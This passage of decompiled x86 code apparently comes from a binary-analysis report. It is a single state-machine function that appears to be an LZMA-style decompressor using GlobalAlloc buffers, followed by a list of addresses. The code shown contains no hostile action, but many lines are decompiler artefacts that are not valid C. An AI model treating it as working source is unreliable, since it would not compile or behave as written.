                                                				signed int _v72;
                                                				signed int _v76;
                                                				signed int _v80;
                                                				signed int _v84;
                                                				signed int _v88;
                                                				signed int _v92;
                                                				signed int _v95;
                                                				signed int _v96;
                                                				signed int _v100;
                                                				signed int _v104;
                                                				signed int _v108;
                                                				signed int _v112;
                                                				signed int _v116;
                                                				signed int _v120;
                                                				intOrPtr _v124;
                                                				signed int _v128;
                                                				signed int _v132;
                                                				signed int _v136;
                                                				void _v140;
                                                				void* _v148;
                                                				signed int _t537;
                                                				signed int _t538;
                                                				signed int _t572;
                                                
                                                				_t572 = 0x22;
                                                				_v148 = __ecx;
                                                				memcpy( &_v140, __ecx, _t572 << 2);
                                                				if(_v52 == 0xffffffff) {
                                                					return 1;
                                                				}
                                                				while(1) {
                                                					L3:
                                                					_t537 = _v140;
                                                					if(_t537 > 0x1c) {
                                                						break;
                                                					}
                                                					switch( *((intOrPtr*)(_t537 * 4 +  &M00406A77))) {
                                                						case 0:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								goto L173;
                                                							}
                                                							_v112 = _v112 - 1;
                                                							_v116 = _v116 + 1;
                                                							_t537 =  *_v116;
                                                							__eflags = _t537 - 0xe1;
                                                							if(_t537 > 0xe1) {
                                                								goto L174;
                                                							}
                                                							_t542 = _t537 & 0x000000ff;
                                                							_push(0x2d);
                                                							asm("cdq");
                                                							_pop(_t576);
                                                							_push(9);
                                                							_pop(_t577);
                                                							_t622 = _t542 / _t576;
                                                							_t544 = _t542 % _t576 & 0x000000ff;
                                                							asm("cdq");
                                                							_t617 = _t544 % _t577 & 0x000000ff;
                                                							_v64 = _t617;
                                                							_v32 = (1 << _t622) - 1;
                                                							_v28 = (1 << _t544 / _t577) - 1;
                                                							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                							__eflags = 0x600 - _v124;
                                                							if(0x600 == _v124) {
                                                								L12:
                                                								__eflags = _t625;
                                                								if(_t625 == 0) {
                                                									L14:
                                                									_v76 = _v76 & 0x00000000;
                                                									_v68 = _v68 & 0x00000000;
                                                									goto L17;
                                                								} else {
                                                									goto L13;
                                                								}
                                                								do {
                                                									L13:
                                                									_t625 = _t625 - 1;
                                                									__eflags = _t625;
                                                									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                								} while (_t625 != 0);
                                                								goto L14;
                                                							}
                                                							__eflags = _v8;
                                                							if(_v8 != 0) {
                                                								GlobalFree(_v8);
                                                							}
                                                							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                							__eflags = _t537;
                                                							_v8 = _t537;
                                                							if(_t537 == 0) {
                                                								goto L174;
                                                							} else {
                                                								_v124 = 0x600;
                                                								goto L12;
                                                							}
                                                						case 1:
                                                							L15:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 1;
                                                								goto L173;
                                                							}
                                                							_v112 = _v112 - 1;
                                                							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                							_v116 = _v116 + 1;
                                                							_t50 =  &_v76;
                                                							 *_t50 = _v76 + 1;
                                                							__eflags =  *_t50;
                                                							L17:
                                                							__eflags = _v76 - 4;
                                                							if(_v76 < 4) {
                                                								goto L15;
                                                							}
                                                							_t550 = _v68;
                                                							__eflags = _t550 - _v120;
                                                							if(_t550 == _v120) {
                                                								L22:
                                                								_v76 = 5;
                                                								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                								goto L25;
                                                							}
                                                							__eflags = _v12;
                                                							_v120 = _t550;
                                                							if(_v12 != 0) {
                                                								GlobalFree(_v12); // executed
                                                							}
                                                							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                							__eflags = _t537;
                                                							_v12 = _t537;
                                                							if(_t537 == 0) {
                                                								goto L174;
                                                							} else {
                                                								goto L22;
                                                							}
                                                						case 2:
                                                							L26:
                                                							_t557 = _v100 & _v32;
                                                							_v136 = 6;
                                                							_v80 = _t557;
                                                							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                							goto L135;
                                                						case 3:
                                                							L23:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 3;
                                                								goto L173;
                                                							}
                                                							_v112 = _v112 - 1;
                                                							_t72 =  &_v116;
                                                							 *_t72 = _v116 + 1;
                                                							__eflags =  *_t72;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							L25:
                                                							_v76 = _v76 - 1;
                                                							__eflags = _v76;
                                                							if(_v76 != 0) {
                                                								goto L23;
                                                							}
                                                							goto L26;
                                                						case 4:
                                                							L136:
                                                							_t559 =  *_t626;
                                                							_t610 = _t559 & 0x0000ffff;
                                                							_t591 = (_v20 >> 0xb) * _t610;
                                                							__eflags = _v16 - _t591;
                                                							if(_v16 >= _t591) {
                                                								_v20 = _v20 - _t591;
                                                								_v16 = _v16 - _t591;
                                                								_v68 = 1;
                                                								_t560 = _t559 - (_t559 >> 5);
                                                								__eflags = _t560;
                                                								 *_t626 = _t560;
                                                							} else {
                                                								_v20 = _t591;
                                                								_v68 = _v68 & 0x00000000;
                                                								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                							}
                                                							__eflags = _v20 - 0x1000000;
                                                							if(_v20 >= 0x1000000) {
                                                								goto L142;
                                                							} else {
                                                								goto L140;
                                                							}
                                                						case 5:
                                                							L140:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 5;
                                                								goto L173;
                                                							}
                                                							_v20 = _v20 << 8;
                                                							_v112 = _v112 - 1;
                                                							_t464 =  &_v116;
                                                							 *_t464 = _v116 + 1;
                                                							__eflags =  *_t464;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							L142:
                                                							_t561 = _v136;
                                                							goto L143;
                                                						case 6:
                                                							__edx = 0;
                                                							__eflags = _v68;
                                                							if(_v68 != 0) {
                                                								__eax = _v8;
                                                								__ecx = _v60;
                                                								_v56 = 1;
                                                								_v136 = 7;
                                                								__esi = _v8 + 0x180 + _v60 * 2;
                                                								goto L135;
                                                							}
                                                							__eax = _v96 & 0x000000ff;
                                                							__esi = _v100;
                                                							__cl = 8;
                                                							__cl = 8 - _v64;
                                                							__esi = _v100 & _v28;
                                                							__eax = (_v96 & 0x000000ff) >> 8;
                                                							__ecx = _v64;
                                                							__esi = (_v100 & _v28) << 8;
                                                							__ecx = _v8;
                                                							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                							__eflags = _v60 - 4;
                                                							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                							if(_v60 >= 4) {
                                                								__eflags = _v60 - 0xa;
                                                								if(_v60 >= 0xa) {
                                                									_t103 =  &_v60;
                                                									 *_t103 = _v60 - 6;
                                                									__eflags =  *_t103;
                                                								} else {
                                                									_v60 = _v60 - 3;
                                                								}
                                                							} else {
                                                								_v60 = 0;
                                                							}
                                                							__eflags = _v56 - __edx;
                                                							if(_v56 == __edx) {
                                                								__ebx = 0;
                                                								__ebx = 1;
                                                								goto L63;
                                                							}
                                                							__eax = _v24;
                                                							__eax = _v24 - _v48;
                                                							__eflags = __eax - _v120;
                                                							if(__eax >= _v120) {
                                                								__eax = __eax + _v120;
                                                								__eflags = __eax;
                                                							}
                                                							__ecx = _v12;
                                                							__ebx = 0;
                                                							__ebx = 1;
                                                							__al =  *((intOrPtr*)(__eax + __ecx));
                                                							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                							goto L43;
                                                						case 7:
                                                							__eflags = _v68 - 1;
                                                							if(_v68 != 1) {
                                                								__eax = _v40;
                                                								_v132 = 0x16;
                                                								_v36 = _v40;
                                                								__eax = _v44;
                                                								_v40 = _v44;
                                                								__eax = _v48;
                                                								_v44 = _v48;
                                                								__eax = 0;
                                                								__eflags = _v60 - 7;
                                                								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                								__al = __al & 0x000000fd;
                                                								__eax = (__eflags >= 0) - 1 + 0xa;
                                                								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                								__eax = _v8;
                                                								__eax = _v8 + 0x664;
                                                								__eflags = __eax;
                                                								_v92 = __eax;
                                                								goto L71;
                                                							}
                                                							__eax = _v8;
                                                							__ecx = _v60;
                                                							_v136 = 8;
                                                							__esi = _v8 + 0x198 + _v60 * 2;
                                                							goto L135;
                                                						case 8:
                                                							__eflags = _v68;
                                                							if(_v68 != 0) {
                                                								__eax = _v8;
                                                								__ecx = _v60;
                                                								_v136 = 0xa;
                                                								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                							} else {
                                                								__eax = _v60;
                                                								__ecx = _v8;
                                                								__eax = _v60 + 0xf;
                                                								_v136 = 9;
                                                								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                							}
                                                							goto L135;
                                                						case 9:
                                                							__eflags = _v68;
                                                							if(_v68 != 0) {
                                                								goto L92;
                                                							}
                                                							__eflags = _v100;
                                                							if(_v100 == 0) {
                                                								goto L174;
                                                							}
                                                							__eax = 0;
                                                							__eflags = _v60 - 7;
                                                							_t264 = _v60 - 7 >= 0;
                                                							__eflags = _t264;
                                                							0 | _t264 = _t264 + _t264 + 9;
                                                							_v60 = _t264 + _t264 + 9;
                                                							goto L78;
                                                						case 0xa:
                                                							__eflags = _v68;
                                                							if(_v68 != 0) {
                                                								__eax = _v8;
                                                								__ecx = _v60;
                                                								_v136 = 0xb;
                                                								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                								goto L135;
                                                							}
                                                							__eax = _v44;
                                                							goto L91;
                                                						case 0xb:
                                                							__eflags = _v68;
                                                							if(_v68 != 0) {
                                                								__ecx = _v40;
                                                								__eax = _v36;
                                                								_v36 = _v40;
                                                							} else {
                                                								__eax = _v40;
                                                							}
                                                							__ecx = _v44;
                                                							_v40 = _v44;
                                                							L91:
                                                							__ecx = _v48;
                                                							_v48 = __eax;
                                                							_v44 = _v48;
                                                							L92:
                                                							__eax = _v8;
                                                							_v132 = 0x15;
                                                							__eax = _v8 + 0xa68;
                                                							_v92 = _v8 + 0xa68;
                                                							goto L71;
                                                						case 0xc:
                                                							L102:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 0xc;
                                                								goto L173;
                                                							}
                                                							__ecx = _v116;
                                                							__eax = _v16;
                                                							_v20 = _v20 << 8;
                                                							__ecx =  *_v116 & 0x000000ff;
                                                							_v112 = _v112 - 1;
                                                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							_t340 =  &_v116;
                                                							 *_t340 = _v116 + 1;
                                                							__eflags =  *_t340;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							__eax = _v48;
                                                							goto L104;
                                                						case 0xd:
                                                							L39:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 0xd;
                                                								goto L173;
                                                							}
                                                							__ecx = _v116;
                                                							__eax = _v16;
                                                							_v20 = _v20 << 8;
                                                							__ecx =  *_v116 & 0x000000ff;
                                                							_v112 = _v112 - 1;
                                                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							_t127 =  &_v116;
                                                							 *_t127 = _v116 + 1;
                                                							__eflags =  *_t127;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							L41:
                                                							__eax = _v68;
                                                							__eflags = _v76 - _v68;
                                                							if(_v76 != _v68) {
                                                								goto L50;
                                                							}
                                                							__eflags = __ebx - 0x100;
                                                							if(__ebx >= 0x100) {
                                                								goto L56;
                                                							}
                                                							L43:
                                                							__eax = _v95 & 0x000000ff;
                                                							_v95 = _v95 << 1;
                                                							__ecx = _v92;
                                                							__eax = (_v95 & 0x000000ff) >> 7;
                                                							_v76 = __eax;
                                                							__eax = __eax + 1;
                                                							__eax = __eax << 8;
                                                							__eax = __eax + __ebx;
                                                							__esi = _v92 + __eax * 2;
                                                							_v20 = _v20 >> 0xb;
                                                							__ax =  *__esi;
                                                							_v88 = __esi;
                                                							__edx = __ax & 0x0000ffff;
                                                							__ecx = (_v20 >> 0xb) * __edx;
                                                							__eflags = _v16 - __ecx;
                                                							if(_v16 >= __ecx) {
                                                								_v20 = _v20 - __ecx;
                                                								_v16 = _v16 - __ecx;
                                                								__cx = __ax;
                                                								_v68 = 1;
                                                								__cx = __ax >> 5;
                                                								__eflags = __eax;
                                                								__ebx = __ebx + __ebx + 1;
                                                								 *__esi = __ax;
                                                							} else {
                                                								_v68 = _v68 & 0x00000000;
                                                								_v20 = __ecx;
                                                								0x800 = 0x800 - __edx;
                                                								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                								__ebx = __ebx + __ebx;
                                                								 *__esi = __cx;
                                                							}
                                                							__eflags = _v20 - 0x1000000;
                                                							_v72 = __ebx;
                                                							if(_v20 >= 0x1000000) {
                                                								goto L41;
                                                							} else {
                                                								goto L39;
                                                							}
                                                						case 0xe:
                                                							L48:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 0xe;
                                                								goto L173;
                                                							}
                                                							__ecx = _v116;
                                                							__eax = _v16;
                                                							_v20 = _v20 << 8;
                                                							__ecx =  *_v116 & 0x000000ff;
                                                							_v112 = _v112 - 1;
                                                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							_t161 =  &_v116;
                                                							 *_t161 = _v116 + 1;
                                                							__eflags =  *_t161;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							while(1) {
                                                								L50:
                                                								__eflags = __ebx - 0x100;
                                                								if(__ebx >= 0x100) {
                                                									break;
                                                								}
                                                								__eax = _v92;
                                                								__edx = __ebx + __ebx;
                                                								__ecx = _v20;
                                                								__esi = __edx + __eax;
                                                								__ecx = _v20 >> 0xb;
                                                								__ax =  *__esi;
                                                								_v88 = __esi;
                                                								__edi = __ax & 0x0000ffff;
                                                								__ecx = (_v20 >> 0xb) * __edi;
                                                								__eflags = _v16 - __ecx;
                                                								if(_v16 >= __ecx) {
                                                									_v20 = _v20 - __ecx;
                                                									_v16 = _v16 - __ecx;
                                                									__cx = __ax;
                                                									_t175 = __edx + 1; // 0x1
                                                									__ebx = _t175;
                                                									__cx = __ax >> 5;
                                                									__eflags = __eax;
                                                									 *__esi = __ax;
                                                								} else {
                                                									_v20 = __ecx;
                                                									0x800 = 0x800 - __edi;
                                                									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                									__ebx = __ebx + __ebx;
                                                									 *__esi = __cx;
                                                								}
                                                								__eflags = _v20 - 0x1000000;
                                                								_v72 = __ebx;
                                                								if(_v20 >= 0x1000000) {
                                                									continue;
                                                								} else {
                                                									goto L48;
                                                								}
                                                							}
                                                							L56:
                                                							_t178 =  &_v56;
                                                							 *_t178 = _v56 & 0x00000000;
                                                							__eflags =  *_t178;
                                                							goto L57;
                                                						case 0xf:
                                                							L60:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 0xf;
                                                								goto L173;
                                                							}
                                                							__ecx = _v116;
                                                							__eax = _v16;
                                                							_v20 = _v20 << 8;
                                                							__ecx =  *_v116 & 0x000000ff;
                                                							_v112 = _v112 - 1;
                                                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							_t208 =  &_v116;
                                                							 *_t208 = _v116 + 1;
                                                							__eflags =  *_t208;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							L62:
                                                							__eflags = __ebx - 0x100;
                                                							if(__ebx >= 0x100) {
                                                								L57:
                                                								__al = _v72;
                                                								_v96 = _v72;
                                                								goto L58;
                                                							}
                                                							L63:
                                                							__eax = _v92;
                                                							__edx = __ebx + __ebx;
                                                							__ecx = _v20;
                                                							__esi = __edx + __eax;
                                                							__ecx = _v20 >> 0xb;
                                                							__ax =  *__esi;
                                                							_v88 = __esi;
                                                							__edi = __ax & 0x0000ffff;
                                                							__ecx = (_v20 >> 0xb) * __edi;
                                                							__eflags = _v16 - __ecx;
                                                							if(_v16 >= __ecx) {
                                                								_v20 = _v20 - __ecx;
                                                								_v16 = _v16 - __ecx;
                                                								__cx = __ax;
                                                								_t222 = __edx + 1; // 0x1
                                                								__ebx = _t222;
                                                								__cx = __ax >> 5;
                                                								__eflags = __eax;
                                                								 *__esi = __ax;
                                                							} else {
                                                								_v20 = __ecx;
                                                								0x800 = 0x800 - __edi;
                                                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                								__ebx = __ebx + __ebx;
                                                								 *__esi = __cx;
                                                							}
                                                							__eflags = _v20 - 0x1000000;
                                                							_v72 = __ebx;
                                                							if(_v20 >= 0x1000000) {
                                                								goto L62;
                                                							} else {
                                                								goto L60;
                                                							}
                                                						case 0x10:
                                                							L112:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 0x10;
                                                								goto L173;
                                                							}
                                                							__ecx = _v116;
                                                							__eax = _v16;
                                                							_v20 = _v20 << 8;
                                                							__ecx =  *_v116 & 0x000000ff;
                                                							_v112 = _v112 - 1;
                                                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							_t371 =  &_v116;
                                                							 *_t371 = _v116 + 1;
                                                							__eflags =  *_t371;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							goto L114;
                                                						case 0x11:
                                                							L71:
                                                							__esi = _v92;
                                                							_v136 = 0x12;
                                                							goto L135;
                                                						case 0x12:
                                                							__eflags = _v68;
                                                							if(_v68 != 0) {
                                                								__eax = _v92;
                                                								_v136 = 0x13;
                                                								__esi = _v92 + 2;
                                                								L135:
                                                								_v88 = _t626;
                                                								goto L136;
                                                							}
                                                							__eax = _v80;
                                                							_v52 = _v52 & 0x00000000;
                                                							__ecx = _v92;
                                                							__eax = _v80 << 4;
                                                							__eflags = __eax;
                                                							__eax = _v92 + __eax + 4;
                                                							goto L133;
                                                						case 0x13:
                                                							__eflags = _v68;
                                                							if(_v68 != 0) {
                                                								_t475 =  &_v92;
                                                								 *_t475 = _v92 + 0x204;
                                                								__eflags =  *_t475;
                                                								_v52 = 0x10;
                                                								_v68 = 8;
                                                								L147:
                                                								_v128 = 0x14;
                                                								goto L148;
                                                							}
                                                							__eax = _v80;
                                                							__ecx = _v92;
                                                							__eax = _v80 << 4;
                                                							_v52 = 8;
                                                							__eax = _v92 + (_v80 << 4) + 0x104;
                                                							L133:
                                                							_v92 = __eax;
                                                							_v68 = 3;
                                                							goto L147;
                                                						case 0x14:
                                                							_v52 = _v52 + __ebx;
                                                							__eax = _v132;
                                                							goto L143;
                                                						case 0x15:
                                                							__eax = 0;
                                                							__eflags = _v60 - 7;
                                                							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                							__al = __al & 0x000000fd;
                                                							__eax = (__eflags >= 0) - 1 + 0xb;
                                                							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                							goto L123;
                                                						case 0x16:
                                                							__eax = _v52;
                                                							__eflags = __eax - 4;
                                                							if(__eax >= 4) {
                                                								_push(3);
                                                								_pop(__eax);
                                                							}
                                                							__ecx = _v8;
                                                							_v68 = 6;
                                                							__eax = __eax << 7;
                                                							_v128 = 0x19;
                                                							_v92 = __eax;
                                                							goto L148;
                                                						case 0x17:
                                                							L148:
                                                							__eax = _v68;
                                                							_v84 = 1;
                                                							_v76 = _v68;
                                                							goto L152;
                                                						case 0x18:
                                                							L149:
                                                							__eflags = _v112;
                                                							if(_v112 == 0) {
                                                								_v140 = 0x18;
                                                								goto L173;
                                                							}
                                                							__ecx = _v116;
                                                							__eax = _v16;
                                                							_v20 = _v20 << 8;
                                                							__ecx =  *_v116 & 0x000000ff;
                                                							_v112 = _v112 - 1;
                                                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							_t490 =  &_v116;
                                                							 *_t490 = _v116 + 1;
                                                							__eflags =  *_t490;
                                                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                							L151:
                                                							_t493 =  &_v76;
                                                							 *_t493 = _v76 - 1;
                                                							__eflags =  *_t493;
                                                							L152:
                                                							__eflags = _v76;
                                                							if(_v76 <= 0) {
                                                								__ecx = _v68;
                                                								__ebx = _v84;
                                                								0 = 1;
                                                								__eax = 1 << __cl;
                                                								__ebx = _v84 - (1 << __cl);
                                                								__eax = _v128;
                                                								_v72 = __ebx;
                                                								L143:
                                                								_v140 = _t561;
                                                								goto L3;
                                                							}
                                                							__eax = _v84;
                                                							_v20 = _v20 >> 0xb;
                                                							__edx = _v84 + _v84;
                                                							__eax = _v92;
                                                							__esi = __edx + __eax;
                                                							_v88 = __esi;
                                                							__ax =  *__esi;
                                                							__edi = __ax & 0x0000ffff;
                                                							__ecx = (_v20 >> 0xb) * __edi;
                                                							__eflags = _v16 - __ecx;
                                                							if(_v16 >= __ecx) {
                                                								_v20 = _v20 - __ecx;
                                                								_v16 = _v16 - __ecx;
                                                								__cx = __ax;
                                                								__cx = __ax >> 5;
                                                								__eax = __eax - __ecx;
                                                								__edx = __edx + 1;
                                                								__eflags = __edx;
                                                								 *__esi = __ax;
                                                								_v84 = __edx;
                                                							} else {
                                                								_v20 = __ecx;
                                                								0x800 = 0x800 - __edi;
                                                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                								_v84 = _v84 << 1;
                                                								 *__esi = __cx;
                                                							}
                                                							__eflags = _v20 - 0x1000000;
                                                							if(_v20 >= 0x1000000) {
                                                								goto L151;
                                                							} else {
                                                								goto L149;
                                                							}
                                                						case 0x19:
                                                							__eflags = __ebx - 4;
                                                							if(__ebx < 4) {
                                                								_v48 = __ebx;
                                                								L122:
                                                								_t399 =  &_v48;
                                                								 *_t399 = _v48 + 1;
                                                								__eflags =  *_t399;
                                                								L123:
                                                								__eax = _v48;
                                                								__eflags = __eax;
                                                								if(__eax == 0) {
                                                									_v52 = _v52 | 0xffffffff;
                                                									goto L173;
                                                								}
                                                								__eflags = __eax - _v100;
                                                								if(__eax > _v100) {
                                                									goto L174;
                                                								}
                                                								_v52 = _v52 + 2;
                                                								__eax = _v52;
                                                								_t406 =  &_v100;
                                                								 *_t406 = _v100 + _v52;
                                                								__eflags =  *_t406;
                                                								goto L126;
                                                							}
                                                							__ecx = __ebx;
                                                							__eax = __ebx;
                                                							__ecx = __ebx >> 1;
                                                							__eax = __ebx & 0x00000001;
                                                							__ecx = (__ebx >> 1) - 1;
                                                							__al = __al | 0x00000002;
                                                							__eax = (__ebx & 0x00000001) << __cl;
                                                							__eflags = __ebx - 0xe;
                                                							_v48 = __eax;
                                                							if(__ebx >= 0xe) {
                                                								__ebx = 0;
                                                								_v76 = __ecx;
                                                								L105:
                                                								__eflags = _v76;
                                                								if(_v76 <= 0) {
                                                									__eax = __eax + __ebx;
                                                									_v68 = 4;
                                                									_v48 = __eax;
                                                									__eax = _v8;
                                                									__eax = _v8 + 0x644;
                                                									__eflags = __eax;
                                                									L111:
                                                									__ebx = 0;
                                                									_v92 = __eax;
                                                									_v84 = 1;
                                                									_v72 = 0;
                                                									_v76 = 0;
                                                									L115:
                                                									__eax = _v68;
                                                									__eflags = _v76 - _v68;
                                                									if(_v76 >= _v68) {
                                                										_t397 =  &_v48;
                                                										 *_t397 = _v48 + __ebx;
                                                										__eflags =  *_t397;
                                                										goto L122;
                                                									}
                                                									__eax = _v84;
                                                									_v20 = _v20 >> 0xb;
                                                									__edi = _v84 + _v84;
                                                									__eax = _v92;
                                                									__esi = __edi + __eax;
                                                									_v88 = __esi;
                                                									__ax =  *__esi;
                                                									__ecx = __ax & 0x0000ffff;
                                                									__edx = (_v20 >> 0xb) * __ecx;
                                                									__eflags = _v16 - __edx;
                                                									if(_v16 >= __edx) {
                                                										__ecx = 0;
                                                										_v20 = _v20 - __edx;
                                                										__ecx = 1;
                                                										_v16 = _v16 - __edx;
                                                										__ebx = 1;
                                                										__ecx = _v76;
                                                										__ebx = 1 << __cl;
                                                										__ecx = 1 << __cl;
                                                										__ebx = _v72;
                                                										__ebx = _v72 | __ecx;
                                                										__cx = __ax;
                                                										__cx = __ax >> 5;
                                                										__eax = __eax - __ecx;
                                                										__edi = __edi + 1;
                                                										__eflags = __edi;
                                                										_v72 = __ebx;
                                                										 *__esi = __ax;
                                                										_v84 = __edi;
                                                									} else {
                                                										_v20 = __edx;
                                                										0x800 = 0x800 - __ecx;
                                                										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                										_v84 = _v84 << 1;
                                                										 *__esi = __dx;
                                                									}
                                                									__eflags = _v20 - 0x1000000;
                                                									if(_v20 >= 0x1000000) {
                                                										L114:
                                                										_t374 =  &_v76;
                                                										 *_t374 = _v76 + 1;
                                                										__eflags =  *_t374;
                                                										goto L115;
                                                									} else {
                                                										goto L112;
                                                									}
                                                								}
                                                								__ecx = _v16;
                                                								__ebx = __ebx + __ebx;
                                                								_v20 = _v20 >> 1;
                                                								__eflags = _v16 - _v20;
                                                								_v72 = __ebx;
                                                								if(_v16 >= _v20) {
                                                									__ecx = _v20;
                                                									_v16 = _v16 - _v20;
                                                									__ebx = __ebx | 0x00000001;
                                                									__eflags = __ebx;
                                                									_v72 = __ebx;
                                                								}
                                                								__eflags = _v20 - 0x1000000;
                                                								if(_v20 >= 0x1000000) {
                                                									L104:
                                                									_t344 =  &_v76;
                                                									 *_t344 = _v76 - 1;
                                                									__eflags =  *_t344;
                                                									goto L105;
                                                								} else {
                                                									goto L102;
                                                								}
                                                							}
                                                							__edx = _v8;
                                                							__eax = __eax - __ebx;
                                                							_v68 = __ecx;
                                                							__eax = _v8 + 0x55e + __eax * 2;
                                                							goto L111;
                                                						case 0x1a:
                                                							L58:
                                                							__eflags = _v104;
                                                							if(_v104 == 0) {
                                                								_v140 = 0x1a;
                                                								goto L173;
                                                							}
                                                							__ecx = _v108;
                                                							__al = _v96;
                                                							__edx = _v12;
                                                							_v100 = _v100 + 1;
                                                							_v108 = _v108 + 1;
                                                							_v104 = _v104 - 1;
                                                							 *_v108 = __al;
                                                							__ecx = _v24;
                                                							 *(_v12 + __ecx) = __al;
                                                							__eax = __ecx + 1;
                                                							__edx = 0;
                                                							_t197 = __eax % _v120;
                                                							__eax = __eax / _v120;
                                                							__edx = _t197;
                                                							goto L82;
                                                						case 0x1b:
                                                							L78:
                                                							__eflags = _v104;
                                                							if(_v104 == 0) {
                                                								_v140 = 0x1b;
                                                								goto L173;
                                                							}
                                                							__eax = _v24;
                                                							__eax = _v24 - _v48;
                                                							__eflags = __eax - _v120;
                                                							if(__eax >= _v120) {
                                                								__eax = __eax + _v120;
                                                								__eflags = __eax;
                                                							}
                                                							__edx = _v12;
                                                							__cl =  *(__edx + __eax);
                                                							__eax = _v24;
                                                							_v96 = __cl;
                                                							 *(__edx + __eax) = __cl;
                                                							__eax = __eax + 1;
                                                							__edx = 0;
                                                							_t280 = __eax % _v120;
                                                							__eax = __eax / _v120;
                                                							__edx = _t280;
                                                							__eax = _v108;
                                                							_v100 = _v100 + 1;
                                                							_v108 = _v108 + 1;
                                                							_t289 =  &_v104;
                                                							 *_t289 = _v104 - 1;
                                                							__eflags =  *_t289;
                                                							 *_v108 = __cl;
                                                							L82:
                                                							_v24 = __edx;
                                                							goto L83;
                                                						case 0x1c:
                                                							while(1) {
                                                								L126:
                                                								__eflags = _v104;
                                                								if(_v104 == 0) {
                                                									break;
                                                								}
                                                								__eax = _v24;
                                                								__eax = _v24 - _v48;
                                                								__eflags = __eax - _v120;
                                                								if(__eax >= _v120) {
                                                									__eax = __eax + _v120;
                                                									__eflags = __eax;
                                                								}
                                                								__edx = _v12;
                                                								__cl =  *(__edx + __eax);
                                                								__eax = _v24;
                                                								_v96 = __cl;
                                                								 *(__edx + __eax) = __cl;
                                                								__eax = __eax + 1;
                                                								__edx = 0;
                                                								_t420 = __eax % _v120;
                                                								__eax = __eax / _v120;
                                                								__edx = _t420;
                                                								__eax = _v108;
                                                								_v108 = _v108 + 1;
                                                								_v104 = _v104 - 1;
                                                								_v52 = _v52 - 1;
                                                								__eflags = _v52;
                                                								 *_v108 = __cl;
                                                								_v24 = _t420;
                                                								if(_v52 > 0) {
                                                									continue;
                                                								} else {
                                                									L83:
                                                									_v140 = 2;
                                                									goto L3;
                                                								}
                                                							}
                                                							_v140 = 0x1c;
                                                							L173:
                                                							_push(0x22);
                                                							_pop(_t574);
                                                							memcpy(_v148,  &_v140, _t574 << 2);
                                                							return 0;
                                                					}
                                                				}
                                                				L174:
                                                				_t538 = _t537 | 0xffffffff;
                                                				return _t538;
                                                			}










































                                                0x004065db
                                                0x004065de
                                                0x004065e5
                                                0x004065ea
                                                0x00000000
                                                0x00000000
                                                0x00406678
                                                0x00406678
                                                0x0040667c
                                                0x00406a1a
                                                0x00000000
                                                0x00406a1a
                                                0x00406682
                                                0x00406685
                                                0x00406688
